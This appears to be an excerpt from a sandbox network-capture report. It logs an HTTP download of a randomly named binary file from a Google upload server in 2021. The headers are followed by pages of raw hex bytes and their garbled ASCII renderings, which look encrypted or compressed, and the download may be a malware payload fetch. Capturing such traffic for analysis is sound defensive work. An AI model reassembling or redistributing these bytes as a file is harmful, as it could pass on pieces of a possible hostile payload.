                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                          Access-Control-Allow-Methods: GET,OPTIONS
                                          Content-Type: application/octet-stream
                                          Content-Disposition: attachment;filename="b0b ay_vHJlSNrJD131.bin";filename*=UTF-8''b0b%20ay_vHJlSNrJD131.bin
                                          Date: Mon, 27 Sep 2021 15:30:09 GMT
                                          Expires: Mon, 27 Sep 2021 15:30:09 GMT
                                          Cache-Control: private, max-age=0
                                          X-Goog-Hash: crc32c=LYN18g==
                                          Content-Length: 221760
                                          Server: UploadServer
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                          Connection: close
                                          2021-09-27 15:30:10 UTC5INData Raw: 15 49 e7 47 da 06 db 72 35 2b 9f 76 99 1e f5 c4 cf 94 d3 cb 96 79 ed 03 5e 9c 7d 30 14 f5 09 bf b0 7b 90 59 7b a3 e3 3f 5e 9b 34 2e 86 9f d7 5a 80 7c 83 dc 80 04 f9 4f 25 43 d4 7b 62 36 0e 93 19 58 b4 a3 61 90 de 37 5e 9f 57 c4 a9 77 3e a0 e0 c5 31 0d 72 5f e8 c1 96 4f 63 a0 fd c0 69 8e cf e3 aa a9 b3 34 f8 a0 97 36 cd 00 86 ed f4 42 bb d5 8f 5e c8 bc 5b 73 57 47 ca 01 61 3d a5 8c 4c 03 c2 e9 45 78 82 32 8a 6a ff 63 00 78 94 fc af d4 5a a6 bb 8d 18 d7 18 eb 63 0a 84 7d 34 c0 d0 95 10 af 06 d4 94 19 bb 51 da fa ca 26 d2 91 f3 92 58 ec 92 d8 94 32 ce 2d 35 b3 cb bf c9 f4 9c 82 56 16 44 84 17 86 d3 dd e0 57 20 04 a5 6d 98 28 26 ed f4 57 38 8e 45 c4 c9 47 4a ae 45 9c e1 08 d5 2e da 14 84 63 1d 63 9f 21 4e 85 85 2c ac 58 54 c3 ff 9c 54 4c d1 ab e7 6f 17 37 78
                                          Data Ascii: IGr5+vy^}0{Y{?^4.Z|O%C{b6Xa7^Ww>1r_Oci46B^[sWGa=LEx2jcxZc}4Q&X2-5VDW m(&W8EGJE.cc!N,XTTLo7x
                                          2021-09-27 15:30:10 UTC9INData Raw: e7 9b 09 bb d5 85 59 df d3 17 73 57 4d cd 21 f1 1a a5 8c 2d 51 78 e7 4f cb 9c 90 e5 d2 fe 25 ca 46 f2 fb 89 a7 7a dc ce ca 33 a7 79 80 2c 39 e5 13 50 a8 8c f8 70 ca 20 c9 b0 77 9b 32 b3 b5 dc 69 81 bb 92 f5 48 b3 bc d5 98 57 b9 2d 35 b9 e3 f1 cb f4 ca d1 7e 38 08 85 1e 90 8d 77 a9 59 74 04 a5 67 95 21 55 b8 14 57 30 9c 4a d4 c6 28 1c f6 46 96 f2 05 c4 2b d0 ca b4 6a 0f 13 95 4e 19 a5 85 26 70 86 5e cb d3 9a 1c 23 86 8b e7 65 cb 1d 56 a1 2e 45 1e 93 b1 1c b3 68 fe 72 a2 d6 29 9b 02 61 8d 4f e3 43 b5 b5 ff 8e 97 8f aa 1d 31 ad d8 b6 83 29 72 ab fe a9 70 0c ce d1 6e 38 34 43 49 4a 63 c7 1a b8 f9 1d fe f7 49 dd 46 6d 4b a9 b6 6b e5 5b 45 e0 27 bb a0 10 91 2d a8 2e ec a1 56 ae dd 61 2c f5 6c 5f 4a c8 ff 87 bb bd 45 9a 64 38 dc 9e 3d c6 81 50 a0 5d 16 ba 77 a8
                                          Data Ascii: YsWM!-QxO%Fz3y,9Pp w2iHW-5~8wYtg!UW0J(F+jN&p^#eV.Ehr)aOC1)rpn84CIJcIFmKk[E'-.Va,l_JEd8=P]w
                                          2021-09-27 15:30:10 UTC12INData Raw: 60 58 5f e5 42 9c f0 04 ca 3d 24 15 a8 6d 2a 0a 8c 39 66 85 85 2c aa fa 4b d7 ec 98 14 5d d5 94 ea 91 16 19 6f aa 31 49 3c 49 a3 34 82 07 64 78 8a f2 44 fa 04 6b af d5 fc 4d ac 6f ff 99 b9 92 54 1c 1c 8e d1 ac a9 0c 0b ab e2 84 6e 15 ca d1 7f 3c 29 51 ee 4b 0d 51 13 ad f6 35 8d f5 49 db e4 72 f5 17 b2 79 ee 5f 5c 1f 3d a7 ae 19 90 04 c5 2c f9 a7 f4 a5 cc 4d 65 e4 68 4a 35 05 fe ab b6 be 5d cc 36 38 dc 90 f0 92 8d 43 ae 5b 10 d1 24 a6 e0 8f 30 8e 8d 06 fe 93 22 9b 2e 20 0f 57 3c 48 0c de b1 4e c5 17 de 75 5c 73 c9 ba 4f 4c 44 ac be c6 2a df 2e 45 3b fb 34 46 78 e6 c4 c4 e0 b7 57 1c c2 eb 2d 75 83 a4 57 48 15 90 a4 f7 9b 98 45 fc 34 b4 a4 5d f7 fc 3e d6 ae e9 c1 f4 8b fd ba bf 09 f0 f8 4d 80 b0 d1 1e 3d 54 8c ca df 1a c5 6a a0 ce 2f c7 21 42 69 35 94 74 a4
                                          Data Ascii: `X_B=$m*9f,K]o1I<I4dxDkMoTn<)QKQ5Iry_\=,MehJ5]68C[$0". W<HNu\sOLD*.E;4FxW-uWHE4]>M=Tj/!Bi5t
                                          2021-09-27 15:30:10 UTC16INData Raw: 16 f2 22 a8 2e e2 ce 90 bf df 43 bb fa 49 7d 09 fb ff 8d a9 a9 6b 8a 2e 38 d6 4a 52 9c 89 78 69 5b 01 d3 54 6e 1e 8e 16 5d 8b 3c dd da 3a 9b 24 37 b2 60 0b 5b 08 d4 7e 4a cb 0e 08 61 71 7e c6 ca 87 32 5c a6 60 ce a0 f7 3c 56 35 d3 1d 42 6f 12 1b e8 f2 a7 6c de c2 fa 2f 05 52 5a 56 6e d1 98 a9 ab ae 98 43 88 3b 94 8c 61 89 e4 34 08 aa d0 b5 dc 7f f7 b1 a6 7e 25 fc 4d 9b 6a c6 c5 14 4f 87 d5 c7 84 f1 42 98 cf 22 d4 ec 46 78 2c b8 7b ac e1 80 54 7c 60 e1 76 8c 85 75 9f 09 07 7e 95 5d a2 0c 19 3c ed 47 60 ac 0b b7 0d f2 87 d8 54 2f 3f 2b 85 f3 58 84 75 4a 0f 5c 23 7d 8d c8 09 c4 05 02 c5 e3 fe 82 cf 76 86 8c 02 c0 99 6c 7d 20 33 ce 06 15 b5 88 ae e8 36 dd db f3 3b 27 da dc d8 3b fc 8b d7 80 5a dc 6f 2a 95 ca 48 37 91 9d e7 c7 97 9c fe 9f 64 c2 6b 26 d7 20 c8
                                          Data Ascii: ".CI}k.8JRxi[Tn]<:$7`[~Jaq~2\`<V5Bol/RZVnC;a4~%MjOB"Fx,{T|`vu~]<G`T/?+XuJ\#}vl} 36;';Zo*H7dk&
                                          2021-09-27 15:30:10 UTC18INData Raw: fe 29 e6 f1 ba 39 85 fe 4d 97 16 d8 a0 14 03 87 d5 c7 bf b7 68 a0 c9 0a f6 32 46 6f 35 97 04 7f e1 86 31 92 b0 e3 7c 54 a1 73 aa 09 01 1b c5 65 a2 06 3b 8a ef 56 6e ac a3 b7 0d fe c0 30 54 2f 33 28 07 d6 70 b3 5d 7d 05 4f 0b 41 a6 cf 21 f6 db 02 de 35 a8 32 c1 76 80 e7 dd f3 ef 4e 34 2f 16 ec 19 3d b5 82 bb da 19 8a 09 f3 31 f3 f2 e9 d0 13 f2 e5 4f 86 35 10 11 3d 9f 14 43 3a fc a8 e7 c1 b5 d8 d8 b7 5a ad 13 2c 09 2a f1 73 97 f6 58 62 fb 3e 80 05 ff 66 b0 23 af ce 70 87 5f 4e dd 6c c2 60 e5 62 cb c1 7c bb 19 47 f1 6b 59 6c d8 1d 2a bf 3f f7 23 94 a0 62 4a 5b 60 a9 1b f2 c1 e7 1d d3 34 61 41 57 6e eb d1 37 c7 80 ec c8 fc a1 07 16 b2 73 d4 9f 16 cd 97 c3 00 14 50 f5 3c 76 85 d7 d8 08 41 45 14 a8 84 14 65 71 8b 08 55 07 b2 cb 2f ea 5e 74 1a 78 21 e0 dc 5f de
                                          Data Ascii: )9Mh2Fo51|Tse;Vn0T/3(p]}OA!52vN4/=1O5=C:Z,*sXb>f#p_Nl`b|GkYl*?#bJ[`4aAWn7sP<vAEeqU/^tx!_
                                          2021-09-27 15:30:10 UTC19INData Raw: ad 8a e2 3b 57 2c 6a 6d e5 f7 12 e8 d3 fe d2 d0 6b de 8a cf 8f 37 f3 b1 87 6a 56 0a 3d 73 c7 8c 39 ba ee 23 4c 68 30 1a 63 45 2f d4 10 69 4e e3 79 7f d8 7f a5 c8 28 69 c6 8c d0 07 e3 27 66 5f 74 44 37 dc b4 43 32 51 39 77 a0 46 61 5a 02 24 a3 0f 9a de 37 56 9f 57 c4 4c 88 3e a1 58 c5 31 0d 0b 55 e8 c1 d8 4f 63 a0 7a ca 69 8e c0 e3 aa a9 a9 34 f8 a1 97 36 cd 00 10 e7 f4 42 b5 d5 8f 5e 6c b6 5b 73 58 47 ca 01 fb 3d a5 8d 42 1c 78 e7 f6 c6 8b ff a5 d2 fe 2f 0c 53 c0 94 c9 a7 7a d6 d3 e2 7f a4 79 86 43 69 11 19 5a af d7 b4 72 ca 41 aa e1 77 94 38 b4 da 94 69 81 b0 9c fd 3c 89 61 df 99 38 4d 2c 35 b3 4f b3 c9 f4 c2 c7 56 16 08 85 14 86 be 50 a1 36 8c 08 a5 6d b0 28 26 ed c0 5b 3a 8f 5b c5 c2 47 50 f6 46 9d e1 00 d5 2e 2e 18 84 63 ae 15 9c 21 cf a8 85 2c a3 58
                                          Data Ascii: ;W,jmk7jV=s9#Lh0cE/iNy(i'f_tD7C2Q9wFaZ$7VWL>X1UOczi46B^l[sXG=Bx/SzyCiZrAw8i<a8M,5OVP6m(&[:[GPF..c!,X
                                          2021-09-27 15:30:10 UTC20INData Raw: 6e 06 d1 fe 29 7b 90 4c a8 65 23 94 9b 90 9d 98 52 86 36 4a a5 75 8b cf 3b ee d1 3e 42 0b 83 e0 67 ac 19 ea 72 fa ae c2 36 1f c3 6e ad ce fd 93 d0 ed a2 cf 22 f6 32 46 78 0c 49 69 ad e7 8c 48 64 61 e1 7a 41 8e 23 b2 09 07 70 91 34 b3 0b 6d f9 ed 56 6c eb 3f b6 0d f2 fe e0 55 51 2e f5 8a d2 66 4d 74 2a 29 7f 10 52 da 29 08 ce dd 13 d3 84 35 4d cf 70 91 e4 ec 1a 9b 66 a5 3e 11 9d 16 14 b5 86 95 10 1c e5 dd db 16 f9 da c7 bf f1 f9 8a d1 06 2e 1a 6f 2e 8e 13 28 cd b8 aa e1 d8 94 02 cf b7 5c c3 78 3c 18 30 cf 2b bd 07 5e 4a 88 9c 91 1f fb 22 00 70 97 8d 0c 93 59 66 a3 ce d3 7a d4 02 6b d0 6a 89 4d 3e f1 61 7b bf d5 0f 23 e9 03 f7 23 96 a0 72 48 5b 6c 23 70 e2 da e7 61 cd 0c 4a 3f 40 64 ff c6 92 fe a8 f1 ce 54 6e 17 1c a2 d6 bb 81 3e b6 93 d5 39 36 4d ae 2b 74
                                          Data Ascii: n){Le#R6Ju;>Bgr6n"2FxIiHdazA#p4mVl?UQ.fMt*)R)5Mpf>.o.(\x<0+^J"pYfzkjM>a{##rH[l#paJ?@dTn>96M+t
                                          2021-09-27 15:30:10 UTC22INData Raw: 41 36 40 4d c5 12 23 51 3c 25 85 64 5c b1 37 4a 56 aa 20 13 a8 8b 82 bf 46 19 ec e7 87 7d fd e8 3b 56 0a 7e 6d e5 e4 30 e8 d2 f1 d8 d9 e5 73 52 77 9d 32 e5 ba 96 46 33 0b 3c 7d cd 85 28 89 f6 22 64 25 30 1a 65 79 28 a2 7d b9 32 e3 79 3c fa 6b a5 c6 22 41 c6 dd da 0d 8f 73 4e ce 74 5e 3d 6b a6 45 24 40 3f 3b a3 55 66 7f 39 04 a3 66 90 de 44 58 9e 57 ce 45 80 2f a4 37 c4 30 0d 78 56 f9 c6 43 21 4b a3 fc c0 63 9f c7 f2 a2 c6 b7 35 f8 aa bf 74 cd 00 80 cb e5 4a d4 07 8f 5e c2 b6 73 4b 57 47 c0 df ee 2c a2 9d 4b 2d c7 cf 7d cc 8b f5 75 d2 ea 05 cb 73 c0 95 d6 a7 7a d6 c9 e2 7f b3 6f 86 f2 73 e5 13 5b b4 94 b1 72 5a 26 a6 e1 5c 9b 38 a5 f2 a0 6b 81 b7 95 83 1e 89 bc d1 b1 c7 ea 2d 3f dc a6 bf c9 fe c0 b9 74 16 08 81 3c c0 be 50 a7 1e 25 05 a5 67 f7 2e 27 ed 1e
                                          Data Ascii: A6@M#Q<%d\7JV F};V~m0sRw2F3<}("d%0ey(}2y<k"AsNt^=kE$@?;Uf9fDXWE/70xVC!Kc5tJ^sKWG,K-}uszos[rZ&\8k-?t<P%g.'
                                          2021-09-27 15:30:10 UTC23INData Raw: 4a da 02 5e 50 70 7e c4 89 7f 4c 7f ac be c6 9f f3 24 28 1a fb 25 46 e1 af d3 d9 cf 87 0e 18 c2 fc 04 6f 49 09 51 64 0f bc 92 fd ba 98 43 86 30 87 b2 27 ac e4 3e d2 24 76 ab c5 87 df fa a0 11 e5 d1 48 4c 87 ce e0 3c 50 ce d5 cd 91 d2 74 e0 24 22 de 32 38 64 24 90 6f 85 0e 84 3b bc 48 a1 7c 52 83 6e b1 77 0f 74 bd 61 8a fc 11 e2 eb 7e 4c 84 df bd 8d fc e8 1e 50 f2 c8 f3 8a d6 0e bb 75 4a 01 67 2f 57 b5 ce 1f e6 f5 02 d4 e1 c0 77 69 76 80 e3 ba c8 99 66 a7 51 1e e6 31 11 da 4b bd cb 14 9b f3 f3 31 fd b5 04 d0 13 f2 50 a9 ae 35 1a 6b 45 56 14 47 18 d6 45 e7 c7 97 f1 f2 b7 5c c6 7d 04 27 20 d9 23 83 d8 31 34 8a 3e 80 0b 92 2c a2 61 83 fa bb 87 59 6c ba b6 ad 62 cc 04 c3 cb 7c bb 94 45 f1 67 67 84 f4 1d 2c 9d 00 09 22 84 76 09 36 53 66 81 65 8c c9 e1 c3 d8 73
                                          Data Ascii: J^Pp~L$(%FoIQdC0'>$vHL<Pt$"28d$o;H|Rnwta~LPuJg/WwivfQ1K1P5kEVGE\}' #14>,aYlb|Egg,"v6Sfes
                                          2021-09-27 15:30:10 UTC24INData Raw: af 78 fc 71 a5 90 6c 6c c6 ce c9 02 bb 0c 35 bd 55 06 34 6a 0d b4 f6 f9 58 dd 93 c3 bd 69 32 40 68 eb 4a 2a 50 36 23 e8 46 a2 b1 3d 56 bb af 5f 11 b3 99 7c 33 2b e7 ed b9 88 8d 25 e8 3b 57 dc 6b 7b 1b ef 47 ea f3 54 d2 d0 6b 3a 8b d9 70 36 ac 9d ed 40 d0 75 3d 7d c6 e3 35 8d e4 29 23 63 31 1a 69 77 3f d7 11 6f 21 7e 79 3d d8 53 b0 c4 a4 16 c6 dc db 68 ef 29 66 55 f4 79 37 dc b1 9e ed 50 39 28 d4 4e 61 54 06 0c b2 61 90 d8 1f 7e 9f 57 ce d6 80 3e a0 5c bb 39 0d 72 5b ea 4d a9 4f 63 a1 92 cc 68 8e c5 cb 8e a9 b3 3e 78 a8 97 36 c9 14 06 ca f4 42 bf 08 29 5f c8 bc 59 cb 7f 0a ca 01 e7 15 46 8e 42 1a 6e cf 6b cc 8b f5 bd e1 e7 51 c5 59 c0 90 ee 43 78 d6 cf ca 5b a5 79 8c c3 61 e5 13 5e 97 cc b4 72 ca 24 1e c9 3a 9b 38 b2 f2 6b 6b 81 b7 88 d5 12 89 bc df 8f 0b
                                          Data Ascii: xqll5U4jXi2@hJ*P6#F=V_|3+%;Wk{GTk:p6@u=}5)#c1iw?o!~y=Sh)fUy7P9(NaTa~W>\9r[MOch>x6B)_YFBnkQYCx[ya^r$:8kk
                                          2021-09-27 15:30:10 UTC25INData Raw: 5d 92 9c 43 b1 5b 10 ce 25 56 1f a2 16 92 8f 03 23 fe 31 84 27 37 b6 48 22 40 17 ca 5e 4b f6 0b 22 65 7b 56 d1 a4 41 38 50 b3 ab d1 93 c0 2d 4d 20 c3 db 43 43 1f d4 f2 e8 b0 7d 0b d9 fa 38 71 8b 55 a8 65 23 9d 9d 88 87 4e 50 89 37 a4 b7 42 89 f5 25 c9 87 3f bc d8 80 e6 ba b1 09 35 ef 46 8e 9a da fb 3c 69 9c c2 33 96 fc 69 b8 dc 39 de 23 5d 75 da 91 47 a4 f0 8d 21 6c 73 ea 61 41 92 5d b9 12 18 53 43 64 8e 06 02 e9 f7 80 7b 8f c0 9f 1e ef e8 0f 4f 30 3e 0b 8b fa 75 99 6a 46 16 54 01 44 ae d7 23 30 da 2e da e9 c7 47 e7 62 81 e3 ce d3 81 79 88 3c 0d e6 20 0e aa a0 43 ca 32 eb d9 e2 3a d1 ce cc d0 19 eb 8e c8 a5 26 01 6f 3b 84 0b 73 ec b8 86 f5 ef 8f 8e da bd 4d c7 04 39 08 20 d3 3a 8c e9 6b 59 99 3e 91 14 f6 da a3 4d 8e 84 79 9d 8f 75 ac 77 d1 71 cd 15 d2 de
                                          Data Ascii: ]C[%V#1'7H"@^K"e{VA8P-M CC}8qUe#NP7B%?5F<i3i9#]uG!lsaA]SCd{O0>ujFTD#0.Gby< C2:&o;sM9 :kY>Myuwq
                                          2021-09-27 15:30:10 UTC27INData Raw: 83 24 71 50 93 b0 18 fc 37 32 52 0b ed a3 43 65 ff 19 93 3e 4b 86 21 53 33 a2 91 4d 0e 8b 78 fc 7b 25 98 4c 2c 99 30 9c 00 bb 0c 1d b9 a5 39 6b 2d 95 b5 f6 f9 80 c1 44 4e 9c 41 36 41 7b fe 34 31 40 25 2e eb 6f a3 b1 37 40 45 ae 20 53 f7 a3 9d 33 3d 13 c4 c6 8b ad 8b ec 13 40 21 6a 6b 8a f7 19 e8 d9 dd c0 c1 6f d5 99 c9 96 1f a2 b1 87 44 4f 0d e0 d7 c7 8c 39 9d e0 32 5f 62 29 32 32 5f 2f d2 02 6e 93 7b 79 3d d2 57 92 c6 28 63 ee e4 da 07 e9 f5 e4 5f 74 5e 3f fc b1 c3 32 51 0a 52 a9 57 6d 3b 1f 25 a3 68 ff c0 36 5a 95 7f 96 56 88 38 b3 4f d4 26 1c 62 57 c0 91 d6 4f 65 b3 e8 c7 05 ad cf e3 aa a9 b3 34 d8 e0 cc 15 cd 00 86 ed f4 42 4b ea d6 76 59 bc 5b 79 e0 50 1c 8c ca 3d a5 8d 51 0a 69 f2 54 da 8c 93 88 d2 fe 2f cd 59 c0 b4 86 fc 52 c9 c8 e2 75 8d 59 87 43
                                          Data Ascii: $qP72RCe>K!S3Mx{%L,09k-DNA6A{41@%.o7@E S3=@!jkoDO92_b)22_/n{y=W(c_t^?2QRWm;%h6ZV8O&bWOe4BKvY[yP=QiT/YRuYC
                                          2021-09-27 15:30:10 UTC28INData Raw: 90 8d 04 86 2c a2 06 cd a0 56 b5 ab 5b 65 f5 77 46 39 ea f8 96 bd 39 f4 aa f4 2e 40 e7 77 8c 81 5a b9 53 10 dd 2f 80 04 8d 1c 85 93 94 f2 ed 3a 9a 3d 28 bc 44 25 4a 0d f6 b1 4a da 0c 82 65 7c 6d cb b4 4a 26 48 bb 33 ed 88 c0 3d 45 32 ea 28 54 78 84 d4 e5 cb 0c 44 18 c8 eb 24 7c 04 76 5d 75 04 81 16 ab 88 98 43 88 3b b1 d0 4b 89 e4 25 db 74 cd ac fc a7 f0 a0 a8 7e b4 fc 4d 9b 68 c0 f1 3b 50 d2 d5 cd 91 db 63 d3 ec 23 de 38 55 60 35 99 7a aa 8e a4 3a ba 6a ed a2 5e 98 54 84 0e 16 7d d2 32 a2 0c 19 3e e5 7c 68 84 df b6 11 f4 e8 1c 54 c1 35 a5 b4 d7 7c b3 75 4a 05 4d 01 0e b4 c4 6e cf d7 02 d4 eb d6 5f ff 73 80 8a c4 c0 99 5e a3 2f 07 f0 3d 3e d4 82 b5 dc e0 e4 f7 f1 29 f5 da c5 c9 ed f9 a6 d9 84 23 1d 79 28 11 a3 6f 27 b8 aa ed dd 91 8f d2 ad a2 c3 47 3c 0a
                                          Data Ascii: ,V[ewF99.@wZS/:=(D%JJe|mJ&H3=E2(TxD$|v]uC;K%t~Mh;Pc#8U`5z:j^T}2>|hT5|uJMn_s^/=>)#y(o'G<
                                          2021-09-27 15:30:10 UTC29INData Raw: 58 69 ee 33 58 54 4d e3 9a 11 94 57 44 ba c0 82 e9 77 a0 3d e7 c6 d9 f9 d3 5f 64 06 7c 9a 29 14 90 87 b7 18 0a 74 17 7a 3a fe b7 58 62 c7 21 a3 16 1b 8c ff 55 27 9a 90 0b 6c f7 78 fc 79 25 98 6c d8 c2 13 9c 21 bb 0c 1d 6c 55 06 32 14 04 b5 f6 f3 37 d6 92 c1 b7 41 36 b7 68 ed 25 02 51 36 29 9f 4d a3 b1 26 40 45 ae 00 13 ac 8b 80 32 3d 19 eb e4 8a ad 74 e8 3b 57 de 68 6d e5 e2 18 e8 d3 f1 d2 d0 6b c6 8a cf 8e 9d f0 b1 87 6d 5c 0a 3d a4 c4 8c 39 80 e4 23 4c 64 30 1a 63 5f 2f d4 11 6f 4e e3 79 d6 d1 7f a5 37 2b 69 c6 d3 da 07 e3 32 66 5f 75 4d 07 d9 b5 cc 32 51 39 12 aa 46 70 42 11 20 9b e2 90 de 37 5a 8e 53 de a8 89 12 a8 51 da 11 db 7f 44 fb c5 d6 5e 67 b8 03 c1 45 88 d0 83 a7 b0 a0 30 f8 b1 93 2d 33 01 aa fd f3 55 d1 0f 38 49 1e 31 70 73 57 46 c6 1d f2 39
                                          Data Ascii: Xi3XTMWDw=_d|)tz:Xb!U'lxy%l!lU27A6h%Q6)M&@E2=t;Whmkm\=9#Ld0c_/oNy7+i2f_uM2Q9FpB 7ZSQD^gE0-3U8I1psWF9
                                          2021-09-27 15:30:10 UTC31INData Raw: da d1 6e 32 1e 5f 13 4a 27 47 97 b5 f9 1d ff e4 42 cc 4d 7b e1 2c a7 79 ff 51 e7 f0 37 9c ba 2c 0a 13 a8 2e f8 03 47 b4 c7 58 61 dd 7d 55 3e f1 5d 96 b1 ae 55 3e 11 38 dc 95 f0 9c 8a 4a bb 5f 12 d8 2a a5 0a a6 9d 81 84 1f e3 60 3d 9b 2e 25 b9 5c 27 73 ab de a0 40 f2 17 20 74 7a dc d1 ae 52 38 4d a6 aa d6 93 4d 13 56 3f fa 36 4e 7e 14 d3 ff 7f be 48 0f d4 66 38 66 8c 4d ca 75 03 8e 9a 1f 88 94 59 95 b4 a5 a8 4e a1 43 3e d6 a0 e7 a2 e0 98 f8 b1 b1 1e f5 02 4c bd b7 de f3 33 78 96 da d2 8b 2e 6b 8c cd 09 db 0a d8 92 db 6f 6d d9 c4 86 3b b8 4a e1 7c 52 92 6d a0 09 57 74 bd 65 9e 0c 13 f3 c5 4b 6b 84 d9 9f c5 f4 e8 14 7c 31 36 f5 8c fe 54 b3 75 40 08 5d 02 41 a6 cc 1b ca cd 10 d5 fd c5 49 dd 73 96 f0 c2 d2 9f 72 b0 28 04 e1 27 3d ef 82 bd cd 38 e2 f3 b2 30 f9
                                          Data Ascii: n2_J'GBM{,yQ7,.GXa}U>]U>8J_*`=.%\'s@ tzR8MMV?6N~Hf8fMuYNC>L3x.kom;J|RmWteKk|16Tu@]AIsr('=80
                                          2021-09-27 15:30:10 UTC32INData Raw: d8 74 1f 07 1f eb 49 45 72 6f 43 44 c6 90 70 6e 79 13 01 3b f9 29 36 46 12 76 c8 f0 a9 52 4d e9 2a 49 bb 64 a0 a2 08 98 5d 92 ac 2f a5 e9 7d b6 74 c6 90 d9 f3 c1 b0 7b 1b 88 98 22 1e 46 84 4e 13 f8 67 25 5e 0d f6 ac ac 70 c2 0b b0 14 30 37 3b 7f 20 b0 96 3a 1d 89 78 ca 7b 25 98 6c 6c c2 13 9e 2d ba 26 1f d6 ac 06 32 0f 28 a0 f4 e4 58 2c 92 c3 bd 9f 3a 68 5f ed 25 29 79 0e 29 87 46 7d b1 35 2f be ae 00 19 72 87 aa 05 3d 19 e6 ce b2 ad 81 e2 e5 57 08 6a 6d e4 f2 18 e8 d3 f1 de d0 62 d1 8a c3 94 37 f3 b0 87 42 7d 0a 35 54 c7 80 23 8c e4 22 57 54 32 1a 44 5f 2f d4 11 69 4e e3 7b 10 d3 55 a7 d2 47 26 c7 dc d0 05 f7 47 36 5e 74 54 35 b3 e4 42 32 5b e7 24 82 71 61 54 08 0c 9b 62 90 d4 e9 5a b5 57 c5 46 88 3e a0 58 c1 31 1b 68 5f e4 db d6 4f 62 bb cd c5 69 5f ce
                                          Data Ascii: tIEroCDpny;)6FvRM*Id]/}t{"FNg%^p07; :x{%ll-&2(X,:h_%)y)F}5/r=Wjmb7B}5T#"WT2D_/iN{UG&G6^tT5B2[$qaTbZWF>X1h_Obi_
                                          2021-09-27 15:30:10 UTC33INData Raw: fe 58 cc 05 6b af 0d fa 4a 31 dc 29 80 33 38 7c 0a ea 92 0e 3b aa 29 0b aa e2 20 66 11 52 d7 79 31 b8 f4 a4 d6 28 4a 1c aa f0 93 49 df 51 dc 46 67 e0 1c bf f7 48 8d 4d 6f 8b 3f 39 18 90 2a b1 27 77 16 80 b7 51 fe 4d ed 6d 55 34 fd d5 99 b8 9f 50 82 27 38 ef 95 52 8d c8 50 aa 4a 17 c6 3f 90 3b 8f 1c 83 84 08 f1 f6 c4 9a 02 08 ab 5c 1b 7d 0b de a6 52 57 01 20 74 71 75 c7 b3 69 15 5f ac b8 60 8f d7 14 78 3d fb 23 e0 68 0c d1 fc f4 87 e3 18 c2 f0 0f 76 87 5e 56 75 0b 80 72 82 b5 9b 5b 91 2c b4 b5 5d 90 1a 3f fa ae eb a7 e7 8f f7 a0 a4 09 1d fd 61 98 b6 47 57 2a 48 8c cc de 93 d0 7b a4 d5 dc df 1e 4f 1a 7c 91 6b a7 eb 9d 28 be 60 f0 78 4f 77 5c 84 01 0e 63 2d 49 ae 12 00 e6 ed 47 6c 9b d6 49 0c d8 f4 36 7d 2c 35 f3 89 d4 58 99 76 4a 03 4a 07 21 28 c8 09 cf f3
                                          Data Ascii: XkJ1)38|;) fRy1(JIQFgHMo?9*'wQMmU4P'8RPJ?;\}RW tqui_`x=#hv^Vur[,]?aGW*H{O|k(`xOw\c-IGlI6},5XvJJ!(
